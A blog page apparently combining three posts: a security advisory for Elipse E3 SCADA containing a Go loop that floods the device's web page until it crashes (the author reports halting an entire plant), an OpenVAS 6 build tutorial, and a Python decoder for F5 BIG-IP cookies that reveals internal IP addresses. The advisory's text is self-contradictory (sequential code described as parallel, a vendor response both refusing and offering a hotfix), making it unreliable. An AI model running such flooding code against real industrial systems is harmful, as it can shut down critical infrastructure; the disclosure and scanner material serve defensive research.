VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.
From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests, authorized by the customer, we were able to stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is proprietary software.
E3 is a supervision and process control system designed to meet
current requirements for connectivity, flexibility and reliability,
making it suitable for use in critical systems (SCADA/PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities via the
'index.html' page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
)

func main() {
	count := 0
	// fmt.Println("")
	// fmt.Println(" _____.__ ___. .__ __ ")
	// fmt.Println(" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
	// fmt.Println(" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
	// fmt.Println(" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
	// fmt.Println(" |__| |__||__| \___ >___ /__||__| /____ > ")
	// fmt.Println(" \/ \/ \/ ")
	// fmt.Println(" bits on fire. ")
	fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
	fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
	fmt.Println("29-10-2013 11:42")
	fmt.Println("mauro.risonho () gmail com")
	fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
	fmt.Println("20 requests connections per second")

	for {
		count++ // one iteration per request (the original doubled the counter)
		// set ip http://192.168.0.1:1681/index.html ->
		// Elipse 3 http://

		fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
		fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
		fmt.Println("29-10-2013 11:42")
		fmt.Println("mauro.risonho () gmail com")
		fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
		fmt.Println("20 requests connections")

		fmt.Println("Connected Port 1681...Testing")
		fmt.Println("Counter Loops: ", count)

		// Sequential GET of the device's web page; the loop never terminates.
		res, err := http.Get("http://192.168.0.1:1681/index.html")
		if err != nil {
			log.Fatal(err)
		}
		body, err := ioutil.ReadAll(res.Body)
		res.Body.Close()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("%s", body)
	}
}

Result: the device crashes after about 20 parallel requests.

Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:

“We would be possible for us to communicate the details of the test, so
we can arrange a hotfix.”

VSLA Virtual Security Labs Anywhere recommends installing the hotfix before
putting the hardware/software into a production environment.

Remediation Steps:
No official fix for these issues will be released for Elipse E3.
However, administrators can mitigate these issues by defining rate-limiting
rules within a web application firewall (WAF) placed in front of the device.

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on information
security.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr

Compiling and Installing – OpenVAS6 packages + Debian 7

In this post I will show how to do an installation from scratch, not from svn but from packages.

First, however, you need to complete the Debian 7 installation with some packages required to compile and run OpenVAS 6.

$ sudo apt-get install nsis alien rpm texlive-latex-extra libqt4-dev g++ libmicrohttpd-dev libxml2-dev libxslt1-dev libxml2-dev libsqlite3-dev doxygen sqlfairy xmltoman sqlite3 gcc make cmake pkg-config libssh-dev gnutls-dev libglib2.0-dev libpcap-dev libgpgme11-dev uuid-dev bison libmicrohttpd5 -y

Next, we need to download the OpenVAS6 packages.

$ wget http://wald.intevation.org/frs/download.php/1159/openvas-libraries-5.0.3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1092/openvas-scanner-3.3.1.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1112/openvas-manager-4.0+beta3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1140/openvas-administrator-1.2.1.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1116/greenbone-security-assistant-4.0+beta3.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1084/gsd-1.2.2.tar.gz
$ wget http://wald.intevation.org/frs/download.php/1131/openvas-cli-1.1.5.tar.gz

And then build them in this order:

1 openvas-libraries
2 openvas-scanner
3 openvas-manager
4 openvas-administrator
5 gsad (greenbone-security-assistant)
6 gsd (greenbone-security-desktop)
7 openvas-cli

1 openvas-libraries

# tar xzvf openvas-libraries-5.0.3.tar.gz
# cd openvas-libraries-5.0.3/
# cmake .
-- Configuring the Libraries...
-- Install prefix: /usr/local
-- checking for module 'wmiclient>=1.3.14'
-- package 'wmiclient>=1.3.14' not found
-- checking for module 'libssh>=0.4.5'
-- package 'libssh>=0.4.5' not found
-- Looking for pcap...
-- Looking for pcap... /usr/lib/libpcap.so
-- Looking for gpgme...
-- Looking for gpgme... /usr/lib/libgpgme.so
-- Looking for libldap...
-- No ldap library found - ldap support disabled
-- Did not find libssh via pkg-config, trying alternative approach ...
-- Found libssh 0.4.5.
-- Looking for uuid...
-- Looking for uuid... /usr/lib/libuuid.so
-- Found Doxygen: /usr/bin/doxygen
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/openvas-libraries-5.0.3

# make install
# cd ..

2 openvas-scanner

# tar xzvf openvas-scanner-3.3.1.tar.gz
# cd openvas-scanner-3.3.1/
# cmake .

-- Configuring the Scanner...
-- Install prefix: /usr/local
-- Looking for pcap...
-- Looking for pcap... /usr/lib/libpcap.so
-- Looking for gpgme...
-- Looking for gpgme... /usr/lib/libgpgme.so
-- Found Doxygen: /usr/bin/doxygen
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/openvas-scanner-3.3.1
# make
# make install
# cd ..

3 openvas-manager

# tar xzvf openvas-manager-4.0+beta3.tar.gz
# cd openvas-manager-4.0+beta3/
# cmake .
-- Configuring the Manager...
-- Install prefix: /usr/local
-- Looking for pcap...
-- Looking for pcap... /usr/lib/libpcap.so
-- Looking for gpgme...
-- Looking for gpgme... /usr/lib/libgpgme.so
-- Looking for xmltoman...
-- Looking for xmltoman... /usr/bin/xmltoman
-- Looking for xmlmantohtml... /usr/bin/xmlmantohtml
-- Looking for SQLFairy...
-- Looking for SQLFairy... /usr/bin/sqlt-diagram, /usr/bin/sqlt
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/openvas-manager-4.0+beta3

# make
# make install
# cd ..

4 openvas-administrator

# tar xzvf openvas-administrator-1.2.1.tar.gz
# cd openvas-administrator-1.2.1/
# cmake .
-- Configuring the OpenVAS Administrator...
-- Install prefix: /usr/local
-- Looking for pcap...
-- Looking for pcap... /usr/lib/libpcap.so
-- Looking for gpgme...
-- Looking for gpgme... /usr/lib/libgpgme.so
-- Looking for xmltoman...
-- Looking for xmltoman... /usr/bin/xmltoman
-- Looking for xmlmantohtml... /usr/bin/xmlmantohtml
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/openvas-administrator-1.2.1

# make
# make install
# cd ..

5 gsad (greenbone-security-assistant)

# tar xzvf greenbone-security-assistant-4.0+beta3.tar.gz
# cd greenbone-security-assistant-4.0+beta3/
# cmake .
-- Configuring greenbone-security-assistant...
-- Looking for pkg-config... /usr/bin/pkg-config
-- Install prefix: /usr/local
-- External XSL transformations, with xsltproc.
-- Looking for xmltoman...
-- Looking for xmltoman... /usr/bin/xmltoman
-- Looking for xmlmantohtml... /usr/bin/xmlmantohtml
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/greenbone-security-assistant-4.0+beta3

# make
# make install
# cd ..

6 gsd (greenbone-security-desktop)

# tar xzvf gsd-1.2.2.tar.gz
# cd gsd-1.2.2
# cmake .
-- Configuring gsd ...
-- Install prefix: /usr/local
-- Looking for xmltoman...
-- Looking for xmltoman... /usr/bin/xmltoman
-- Looking for xmlmantohtml... /usr/bin/xmlmantohtml
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/gsd-1.2.2
# make
# make install
# cd ..

7 openvas-cli

# tar xzvf openvas-cli-1.1.5.tar.gz
# cd openvas-cli-1.1.5
# cmake .
-- Configuring openvas-cli ...
-- Install prefix: /usr/local
-- Looking for xmltoman...
-- Looking for xmltoman... /usr/bin/xmltoman
-- Looking for xmlmantohtml... /usr/bin/xmlmantohtml
-- Configuring done
-- Generating done
-- Build files have been written to: /home/test/openvas/openvas-cli-1.1.5
# make
# make install
# cd ..

When the installation is complete, we configure OpenVAS 6, first updating the database with all the vulnerability tests and plugins (NVTs):

# openvas-nvt-sync

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] The 'OpenVAS NVT Feed' is provided by 'The OpenVAS Project'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed.html'.
[i] NVT dir: /usr/local/var/lib/openvas/plugins
[i] Will use rsync
[i] Using rsync: /usr/bin/rsync
[i] Configured NVT rsync feed: rsync://feed.openvas.org:/nvt-feed
OpenVAS feed server – http://openvas.org/
This service is hosted by Intevation GmbH – http://intevation.de/
All transactions are logged.
Please report problems to admin@intevation.de
receiving incremental file list
[…]

Let's create a user with administrator privileges (for OpenVAS, not the OS):

# openvasad -c 'add_user' -n admin --role=Admin
Enter password: <type a strong password here>

Since OpenVAS protects communication between the scanner and the client with SSL, you must generate the certificates using the openvas-mkcert script, which creates a certificate authority (if one is not already there) and the scanner-side certificate. In this case it will set up a German CA with information from the OpenVAS project and Greenbone (one of the companies that offers paid professional services, besides contributing source code and plugins to the open source community).

# openvas-mkcert
/usr/local/var/lib/openvas/private/CA created
/usr/local/var/lib/openvas/CA created

-------------------------------------------------------------------------------
Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [DE]:
Your state or province name [none]:
Your location (e.g. town) [Berlin]:
Your organization [OpenVAS Users United]:

-------------------------------------------------------------------------------
Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

The following files were created:

. Certification authority:
Certificate = /usr/local/var/lib/openvas/CA/cacert.pem
Private key = /usr/local/var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /usr/local/var/lib/openvas/CA/servercert.pem
Private key = /usr/local/var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Now let's generate the certificate on the client side:

# openvas-mkcert-client -n om -i
Generating RSA private key, 1024 bit long modulus
..................++++++
.......++++++
e is 65537 (0x10001)

[…]

Let's start the scanner; it may take a few minutes to load all the vulnerability plugins (NVTs).

# openvassd

Once the plugins have finished loading, we need to rebuild the database with openvas-manager; for that we use the following commands:

# touch /usr/local/var/lib/openvas/mgr/tasks.d
# openvasmd --backup
# openvasmd --rebuild

OpenVAS 6 uses nmap 5.51:

# wget http://nmap.org/dist/nmap-5.51.6.tgz
# tar xzvf nmap-5.51.6.tgz
# cd nmap-5.51.6
# ./configure
# make
# make install

We need to check that the nmap version is correct:

# nmap -V
Nmap version 5.51.6 ( http://nmap.org )

Now let's start the OpenVAS Administrator:

# openvasad

And then let's start the OpenVAS Manager:

# openvasmd

We also start the GSA (greenbone-security-assistant) to administer our OpenVAS6 installation:

# gsad --http-only --listen=0.0.0.0 -p 9392

Let's check that everything was installed correctly, using this script:

# chmod 755 openvas-check-setup
# ./openvas-check-setup --v6

[...]
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.3.1.
OK: OpenVAS Scanner CA Certificate is present as /usr/local/var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /usr/local/var/lib/openvas/plugins contains 28194 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
Step 2: Checking OpenVAS Manager ...
OK: OpenVAS Manager is present in version 4.0+beta3.
OK: OpenVAS Manager client certificate is present as /usr/local/var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /usr/local/var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 58.
OK: OpenVAS Manager expects database at revision 58.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 28194 NVTs.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator ...
OK: OpenVAS Administrator is present in version 1.2.1.
OK: At least one user exists.
OK: At least one admin user exists.
Step 4: Checking Greenbone Security Assistant (GSA) ...
OK: Greenbone Security Assistant is present in version 4.0+beta3.
Step 5: Checking OpenVAS CLI ...
OK: OpenVAS CLI version 1.1.5.
Step 6: Checking Greenbone Security Desktop (GSD) ...
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running ...
OK: netstat found, extended checks of the OpenVAS services enabled.
OK: OpenVAS Scanner is running and listening on all interfaces.
OK: OpenVAS Scanner is listening on port 9391, which is the default port.
OK: OpenVAS Manager is running and listening on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
OK: OpenVAS Administrator is running and listening on all interfaces.
OK: OpenVAS Administrator is listening on port 9393, which is the default port.
OK: Greenbone Security Assistant is running and listening on all interfaces.
OK: Greenbone Security Assistant is listening on port 9392, which is the default port.
Step 8: Checking nmap installation ...
OK: nmap is present in version 5.51.6.
Step 9: Checking presence of optional tools ...
OK: pdflatex found.
OK: PDF generation successful. The PDF report format is likely to work.
OK: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work.
OK: rpm found, LSC credential package generation for RPM based targets is likely to work.
OK: alien found, LSC credential package generation for DEB based targets is likely to work.
OK: nsis found, LSC credential package generation for Microsoft Windows targets is likely to work.
[...]

Let's connect to port 9392 in the browser, at the URL http://localhost:9392:

[Screenshot: OpenVAS6 + Debian 7]

And finally, log in with the username and password created earlier in OpenVAS6.

[Screenshot: OpenVAS6 - gsad]
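As an added example (not part of the post), a small parser for openvas-check-setup output that an automated install can gate on: it groups each message under its "Step N:" heading, returns the WARNING/ERROR lines (such as the NVT signature-check warning the post's run shows) and confirms that each service listens on its default port. The excerpt used as input is a constructed subset of the output shown above.

```python
import re

# Excerpt of the openvas-check-setup output shown in the post (constructed subset
# for the example; a real run prints many more lines).
SAMPLE_OUTPUT = """\
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.3.1.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
Step 7: Checking if OpenVAS services are up and running ...
OK: OpenVAS Scanner is listening on port 9391, which is the default port.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
OK: OpenVAS Administrator is listening on port 9393, which is the default port.
OK: Greenbone Security Assistant is listening on port 9392, which is the default port.
"""

DEFAULT_PORTS = {"OpenVAS Scanner": 9391, "OpenVAS Manager": 9390,
                 "OpenVAS Administrator": 9393, "Greenbone Security Assistant": 9392}

STEP_RE = re.compile(r"^Step (\d+): (.*?)\s*(?:\.\.\.|…)$")  # "..." or a single ellipsis
MSG_RE = re.compile(r"^(OK|WARNING|ERROR|SUGGEST|FIX): (.*)$")
PORT_RE = re.compile(r"^(.*?) is listening on port (\d+)")

def parse_check_setup(text):
    """Group each 'LEVEL: message' line under the 'Step N:' heading it follows."""
    steps, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = STEP_RE.match(line)
        if m:
            current = int(m.group(1))
            steps[current] = {"title": m.group(2), "messages": []}
            continue
        m = MSG_RE.match(line)
        if m and current is not None:
            steps[current]["messages"].append((m.group(1), m.group(2)))
    return steps

def findings(steps, levels=("WARNING", "ERROR")):
    """Messages an automated install should fail or alert on."""
    return [msg for s in steps.values() for lvl, msg in s["messages"] if lvl in levels]

def listening_ports(steps):
    """Service -> port as reported by the 'services are up and running' step."""
    ports = {}
    for s in steps.values():
        for _lvl, msg in s["messages"]:
            m = PORT_RE.match(msg)
            if m:
                ports[m.group(1)] = int(m.group(2))
    return ports

def port_mismatches(steps, expected=DEFAULT_PORTS):
    """Services missing from the output (None) or listening on a non-default port."""
    actual = listening_ports(steps)
    return {svc: actual.get(svc) for svc, port in expected.items() if actual.get(svc) != port}
```

Note that gsad was started above with --http-only and --listen=0.0.0.0, so the web console is served in plaintext on every interface; a check like this is a good place to also fail when that flag combination is used outside a lab.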

References:

http://www.openvas.org/
http://www.openvas.org/setup-and-start.html
http://www.debian.org/

Python Exploit – F5 BIG-IP Cookie Persistence

I wrote an exploit that confirms the F5 BIG-IP Cookie Persistence vulnerability; as the screenshots show, it is present on both port 80 (http) and port 443 (https):

[Screenshot - 06-05-2013 - 10:49:20]

[Screenshot - 06-05-2013 - 10:49:48]

Ref: http://www.securityspace.com/smysecure/catid.html?id=20089

Test ID: 20089
Category: Web Servers
Title: F5 BIP-IP Cookie Persistence
Summary: F5 BIP-IP(R) Cookie Persistence
Description: Synopsis :The remote load balancer suffers from an information disclosure
vulnerability.

Description :

The remote host appears to be a F5 BigIP load balancer which encodes
within a cookie the IP address of the actual web server it is acting
on behalf of. Additionally, information after 'BIGipServer' is
configured by the user and may be the logical name of the device.
These values may disclose sensitive information, such as internal IP
addresses and names.

Solution:

http://asia.f5.com/solutions/archives/techbriefs/cookie.html

Copyright This script is Copyright (C) 2005 Shavlik Technologies, LLC

Note: the link http://asia.f5.com/solutions/archives/techbriefs/cookie.html to the possible fix no longer exists.
TODO: find another source for the fix.

Exploit:

#!/usr/bin/env python3
# Mauro Risonho de Paula Assumpcao
# Pentester
# mrpa.security@gmail.com
# twitter @firebitsbr
#
#
# exploit_BIGIP_firebits_rev01
# example string BIGIP : 100733612.18724.0000

import struct
import sys

if len(sys.argv) != 2:
    print("Usage: %s encoded_string" % sys.argv[0])
    sys.exit(1)

encoded_string = sys.argv[1]
print("\n[*] String to decode: %s\n" % encoded_string)

# The cookie value has the form <ip>.<port>.0000; only the IP is decoded here.
(host, port, end) = encoded_string.split('.')

# The IP is stored as a little-endian 32-bit integer; its four bytes are the octets.
(a, b, c, d) = struct.pack("<I", int(host))

print("[*] Decoded IP: %s.%s.%s.%s\n" % (a, b, c, d))
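As an added example (not the post's script), a decoder that goes one step further than the script above: it also recovers the port, which is byte-swapped in the same way as the IP in this cookie format, and scans Set-Cookie header lines to report which BIGipServer cookies expose a private address. The sample headers and the pool name are constructed for the example.

```python
import ipaddress
import re
import struct

# Matches a BIGipServer<pool> persistence cookie in a Set-Cookie header line.
BIGIP_RE = re.compile(r"BIGipServer(?P<pool>[^=;\s]*)=(?P<value>[^;\s]+)")

# Constructed sample response headers (not the screenshots from the post).
SAMPLE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Set-Cookie: BIGipServerpool_www=100733612.18724.0000; path=/",
    "Set-Cookie: sessionid=abc123; Secure; HttpOnly",
]

def decode_bigip(value):
    """Decode '<ip>.<port>.0000' into (ip, port); None if the value is not that form."""
    parts = value.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    ip_int, port_int = int(parts[0]), int(parts[1])
    if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
        return None
    # Both fields are written in little-endian host order: the IP's four bytes,
    # read in order, are the octets, and the port's two bytes are swapped
    # relative to network order (so 80 appears as 20480).
    ip = ".".join(str(b) for b in struct.pack("<I", ip_int))
    (port,) = struct.unpack(">H", struct.pack("<H", port_int))
    return ip, port

def scan_headers(lines):
    """Report every decodable BIGipServer cookie and whether it leaks a private address."""
    found = []
    for line in lines:
        if not line.lower().startswith("set-cookie:"):
            continue
        for m in BIGIP_RE.finditer(line):
            decoded = decode_bigip(m.group("value"))
            if decoded is None:
                continue
            ip, port = decoded
            found.append({"pool": m.group("pool"), "ip": ip, "port": port,
                          "internal": ipaddress.ip_address(ip).is_private})
    return found

if __name__ == "__main__":
    for f in scan_headers(SAMPLE_HEADERS):
        print("pool %(pool)s -> %(ip)s:%(port)d (private: %(internal)s)" % f)
```

The post's example value 100733612.18724.0000 decodes to 172.18.1.6:9289, an RFC 1918 address, which is exactly the disclosure the NVT description refers to.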

NOTE:

I haven't programmed full time since 2005, but little by little I'm getting back to writing small scripts, humbly, but let's keep going! :) In the next post I'll try to explain how serious the problem would be if an attacker used this F5 BIG-IP cookie, and the possible damage.

@firebitsbr